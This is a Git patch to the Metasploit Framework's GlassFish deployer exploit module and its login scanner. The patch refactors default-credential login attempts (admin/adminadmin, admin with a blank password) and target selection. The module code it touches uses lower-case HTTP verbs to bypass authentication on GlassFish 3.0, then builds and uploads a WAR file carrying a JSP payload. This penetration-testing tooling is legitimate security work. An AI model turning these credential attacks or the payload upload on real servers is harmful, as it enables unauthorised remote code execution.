From 8e4fa80728fce5748d2814dccc95df4112f96d43 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Wed, 24 Jun 2015 19:30:02 -0500 Subject: [PATCH] This looks good so far --- .../framework/login_scanner/glassfish.rb | 2 +- .../exploits/multi/http/glassfish_deployer.rb | 69 +++++++++++-------- 2 files changed, 41 insertions(+), 30 deletions(-) diff --git a/lib/metasploit/framework/login_scanner/glassfish.rb b/lib/metasploit/framework/login_scanner/glassfish.rb index 8537f8b04b..e3aa4124da 100644 --- a/lib/metasploit/framework/login_scanner/glassfish.rb +++ b/lib/metasploit/framework/login_scanner/glassfish.rb @@ -14,7 +14,7 @@ module Metasploit # @!attribute [r] version # @return [String] Glassfish version - attr_reader :version + attr_accessor :version # @!attribute jsession # @return [String] Cookie session diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index 7fd2600524..5855a3ab9a 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote def auto_target(session, res, version) print_status("Attempting to automatically select a target...") - res = query_serverinfo(session,version) + res = query_serverinfo(session, version) return nil unless res return nil unless res.body @@ -601,7 +601,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{rhost} did not respond on #{app_rport}.") end - #Sleep for a bit before cleanup + # Sleep for a bit before cleanup select(nil, nil, nil, 5) #Start undeploying @@ -619,10 +619,8 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Undeployment complete.") end - def init_loginscanner(creds) - @cred_collection = Metasploit::Framework::CredentialCollection.new( - userpass_file: creds * "\n" - ) + def init_loginscanner + @cred_collection = Metasploit::Framework::CredentialCollection.new @scanner = Metasploit::Framework::LoginScanner::Glassfish.new( configure_http_login_scanner( @@ -654,30 +652,44 @@ class Metasploit3 < Msf::Exploit::Remote end def my_target_host - path = normalize_uri(datastore['PATH']) - my_target_host = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}" + my_target_host = "http://#{rhost.to_s}:#{rport.to_s}#{normalize_uri(datastore['PATH'])}" end def try_normal_login(version) + init_loginscanner + case version when /2\.x|9\.x/ - creds = ['admin adminadmin'] + @cred_collection.prepend_cred( + Metasploit::Framework::Credential.new( + public: 'admin', + private: 'adminadmin', + private_type: :password + )) when /^3\./ - creds = ['admin'] - else - creds = [] + @cred_collection.prepend_cred( + Metasploit::Framework::Credential.new( + public: 'admin', + private: '', + private_type: :password + )) end - creds << "#{datastore['USERNAME']} #{datastore['PASSWORD']}" - - init_loginscanner(creds) + @cred_collection.prepend_cred( + Metasploit::Framework::Credential.new( + public: datastore['USERNAME'], + private: datastore['PASSWORD'], + private_type: :password + )) + @scanner.send_request({'uri'=>'/'}) @scanner.version = version @cred_collection.each do |raw| cred = raw.to_credential + print_status("Trying to login as #{cred.public}:#{cred.private}") result = @scanner.attempt_login(cred) - if result == Metasploit::Model::Login::Status::SUCCESSFUL - return @scanner.:jsession + if result.status == Metasploit::Model::Login::Status::SUCCESSFUL + return @scanner.jsession end end @@ -692,15 +704,11 @@ class Metasploit3 < Msf::Exploit::Remote return sid if sid end - try_normal_login(version, user, pass, 'non-default') + try_normal_login(version) end - def make_war - my_target = auto_target(sid, res, version) if target.name =~ /Automatic/ - fail_with(Failure::NoTarget, "Unable to automatically select a target") unless mytarget - - # Generate payload - p = exploit_regenerate_payload(mytarget.platform, mytarget.arch) + def make_war(selected_target) + p = exploit_regenerate_payload(selected_target.platform, selected_target.arch) jsp_name = rand_text_alphanumeric(4+rand(32-4)) app_base = rand_text_alphanumeric(4+rand(32-4)) @@ -708,8 +716,8 @@ class Metasploit3 < Msf::Exploit::Remote war = p.encoded_war({ :app_name => app_base, :jsp_name => jsp_name, - :arch => mytarget.arch, - :platform => mytarget.platform + :arch => selected_target.arch, + :platform => selected_target.platform }).to_s return app_base, jsp_name, war @@ -729,8 +737,8 @@ class Metasploit3 < Msf::Exploit::Remote # Set HTTP verbs. Lower-case is used to bypass auth on v3.0 @verbs = { - 'GET' => (version == '3.0' || version == '2.x' || version || '9.x') ? "get" : 'GET', - 'POST' => (version == '3.0' || version == '2.x' || version || '9.x') ? 'post' : 'POST', + 'GET' => (version == '3.0' || version == '2.x' || version == '9.x') ? 'get' : 'GET', + 'POST' => (version == '3.0' || version == '2.x' || version == '9.x') ? 'post' : 'POST', } sid = attempt_login(version) @@ -739,7 +747,10 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{my_target_host()} - GlassFish - Failed to authenticate login") end - app_base, jsp_name, war = make_war + selected_target = target.name =~ /Automatic/ ? auto_target(sid, res, version) : target + fail_with(Failure::NoTarget, "Unable to automatically select a target") unless selected_target + + app_base, jsp_name, war = make_war(selected_target) print_status("Uploading payload...") res = upload_exec({ :session => sid,